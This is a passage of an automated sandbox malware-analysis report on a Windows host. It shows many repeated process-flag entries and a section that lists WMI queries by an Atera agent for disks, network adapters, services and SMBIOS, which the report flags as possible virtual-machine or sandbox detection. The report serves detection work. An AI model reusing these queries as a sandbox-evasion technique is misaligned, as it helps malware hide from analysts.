                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID=&quot;\\\\.\\PHYSICALDRIVE0&quot;} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent=&quot;Win32_DiskDrive.DeviceID=\&quot;\\\\\\\\.\\\\PHYSICALDRIVE0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID=&quot;\\\\.\\PHYSICALDRIVE0&quot;} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent=&quot;Win32_DiskDrive.DeviceID=\&quot;\\\\\\\\.\\\\PHYSICALDRIVE0\&quot;&quot;
                                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PhysicalAdapter,Name,PNPDeviceID from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSMBios_RawSMBiosTables
                                Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Name,DisplayName,Description,State from Win32_Service
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name=&apos;MSExchangeIS&apos; OR DisplayName=&apos;MSExchangeIS&apos;
                                Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
